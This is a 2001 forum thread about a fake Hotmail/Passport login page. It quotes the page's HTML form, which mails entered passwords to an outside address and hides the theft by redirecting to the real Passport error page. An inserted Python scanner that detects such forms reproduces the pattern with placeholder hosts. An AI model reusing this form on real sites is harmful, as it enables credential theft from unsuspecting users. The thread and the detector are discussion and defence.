eaglebtc Posted December 27, 2001

OMFG...my friend scared the s*** out of me tonight. :o He created a web page which appeared to be a hotmail/passport login screen (please re-enter your password). He said he was testing "some spam site" of his, and as soon as I entered my password I got about 20 bazillion XXX popups. :o :mad:

After closing all of those, I looked at the Source code for his page. The following four lines literally scared me s***less:

(Please note: the URL in the "action" line below is a REDIRECTOR. Do not follow it. This is CODE, so it should not be linkable anyhow. If you follow it, you are a dirty b4st4rd :p)

<pre>
<FORM method=POST action="http://www.join4free.com/?wm=42960">
<input type=hidden name="to" value="x-rated007@excite.com">
<input type=hidden name="subject" value="Hotmail Password">
<input type=hidden name="redir" value="http://lc2.law5.hotmail.passport.com/cgi-bin/loginerr?disk=&login=&f=0&curmbox=ACTIVE&_lang=&error=4&sec=no&reauth=&id=2&ct=958278062&_lang=&domain=">
</pre>

:o :o :o Look at that! In those four short lines is the power to do the following:

- Forward to a specified site
- send an email with certain information
- Use the Microsoft Passport authentication system to retrieve and verify that information.

My friend should be shot for doing this. I have chewed him out, and even after he convinced me that x-rated007@excite.com is his old email, and that he used it just as a joke, I still did NOT think it was funny.

Do you think this is a HUGE weakness in the Passport system? Can it be abused like the AOL pages that prompt the AOLemmings to enter their passwords? Maybe I'm overreacting a bit, but it did scare me a lot. Perhaps it's nothing at all. What do you think? Let the forum know.
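The form quoted above has a recognisable shape: a password field whose action points at a third-party mailer, plus a hidden "redir" that sends the victim on to the genuine Passport error page. The scanner below, an added example that is not any poster's code, flags both traits in HTML it is given; the trusted host list, the field names login/passwd and the sample page (with placeholder addresses) are assumptions.

```python
"""Flag login forms that post a password off the expected host (the pattern quoted
above). Added example, not any poster's code; sample HTML and host list are assumed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

EXPECTED_HOSTS = {"login.passport.com", "www.passport.com"}  # assumed genuine hosts

class FormScanner(HTMLParser):
    # Collect each <form>'s action, its input (name, type) pairs and hidden values.
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "", "inputs": [], "hidden": {}}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            name, itype = a.get("name") or "", (a.get("type") or "text").lower()
            self._cur["inputs"].append((name, itype))
            if itype == "hidden":
                self._cur["hidden"][name] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def find_suspicious_forms(html, expected_hosts=EXPECTED_HOSTS):
    """Return findings for password forms posting off-host or redirecting to the real login."""
    parser = FormScanner()
    parser.feed(html)
    findings = []
    for f in parser.forms:
        host = urlparse(f["action"]).hostname or ""
        reasons = []
        if any(t == "password" for _, t in f["inputs"]) and host not in expected_hosts:
            reasons.append(f"password posted to {host or '(relative action)'}")
        # A hidden 'redir' to Passport's own error page hides the fake page from the victim.
        rhost = urlparse(f["hidden"].get("redir", "")).hostname or ""
        if rhost.endswith("passport.com") and host not in expected_hosts:
            reasons.append("hidden redirect back to the genuine login page")
        if reasons:
            findings.append({"action": f["action"], "reasons": reasons})
    return findings

# Constructed sample mirroring the quoted form; action host and addresses are placeholders.
PHISH_HTML = """<form method="POST" action="http://mailer.example.net/?wm=PLACEHOLDER">
<input type="hidden" name="to" value="dropbox@example.net"><input type="hidden" name="subject" value="Hotmail Password">
<input type="hidden" name="redir" value="http://lc2.law5.hotmail.passport.com/cgi-bin/loginerr?error=4">
<input type="text" name="login"><input type="password" name="passwd"></form>"""
```

Running `find_suspicious_forms(PHISH_HTML)` yields one finding with both reasons, while a form posting to one of the expected hosts yields none.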
X Posted December 27, 2001

Wonder who voted for your on crack... :ponder: :lick: Ok Ok it was I heh... :D
eaglebtc (Author) Posted December 27, 2001

am i really on crack? cuz i thought it was real. i'm certainly no AOLer. but i think a lot of ppl could be fooled into doing it.
Glowstick Posted December 27, 2001

And then? You can do this with every login system. If the page just looks like Passport, tons of people will fall for it. How do you think hackers get passwords of lots of people? By faking login sites. If Passport wants you to authenticate, just make sure the address bar says www.passport.com. Coz to get Passport authenticated, the affiliated website redirects you to Passport, which redirects you back to the website once you are authenticated.
Faction Posted December 27, 2001

Lol.. i disabled all the messenger passport stuff, but yeah, 4 lines of code = restart of computer. ghey :
Quboid Posted December 27, 2001

Um, you can do that with all logins - make a fake one and save the details or move the visitor anywhere. It's not passport specific. It's dumb visitor specific. :)
Glowstick Posted December 27, 2001

what was it? rundll32 user32.dll,ExitWindowsEx ?? :D
EmuZombie (Veteran) Posted December 27, 2001

url removed, was a porn site
Sub Posted December 27, 2001

Ahh the old AOL Days. Creating Login sites made <>
eaglebtc (Author) Posted December 28, 2001

EmuZombie: That was not the URL he gave me. That was a redirect from his page. Here's the page in question: http://www.staticfree.net/newbieslair/

It looks convincing to me. The reason I got so upset about this is because Microsoft has tried to make a reasonably secure system. Sure, AOLers are just plain stupid to go to a site asking for their password, but when you have something like this that legitimate businesses are trying to use, couldn't any Joe Schmoe set up a phony passport authentication site?

Furthermore, isn't it possible to make the Address Bar show anything you want? Theoretically, you could just show a long hairy URL that looks authentic to the untrained eye...
X Posted December 28, 2001

LOL.. "You're on crack" is winning!! :lick:
freeza Posted December 28, 2001

:ponder:
bud1979 Posted December 28, 2001

this has been out for years. I had a friend 2 years ago create the same thing. it takes your password and then gives them access, also popping you to a porn site.
configure (Veteran) Posted December 28, 2001

Using MS's Passport system to verify the password, now THAT IMHO is brilliant :)
eaglebtc (Author) Posted December 28, 2001

when was this thread moved? who did it?
hurting101 Posted December 28, 2001

I saw something like this that looked just like the Hotmail signin page, and the URL looked the same (it was confusing enough already, how would anyone know?).
configure (Veteran) Posted December 28, 2001

From where was it moved? :ermm:
eaglebtc (Author) Posted December 28, 2001

from the general area. no biggie, just wondered who moved it. maybe emuzombie did. :paranoid:
X Posted December 30, 2001

Poll results:
This is HUGE. Call Microsoft ASAP. 1 (3.45%)
This is pretty serious, but can be controlled. 5 (17.24%)
This isn't a big deal. 3 (10.34%)
You're on crack. 20 (68.97%)

muhaha
eaglebtc (Author) Posted December 31, 2001

hhehe i know :p i prolly tilted the vote against me by including that option :)
X Posted December 31, 2001

Yup heh... :D
kintamanate Posted December 31, 2001

Bah, you are saying this like it's something new? How do you think I found neowin in the first place? i was bored one day and looked at how not to get scammed by this hotmail coding junk. it brought me to an old neowin news post, #60 i think it was. right Neobond? (Back in late May, early June);) ahh those were the days...:disappoin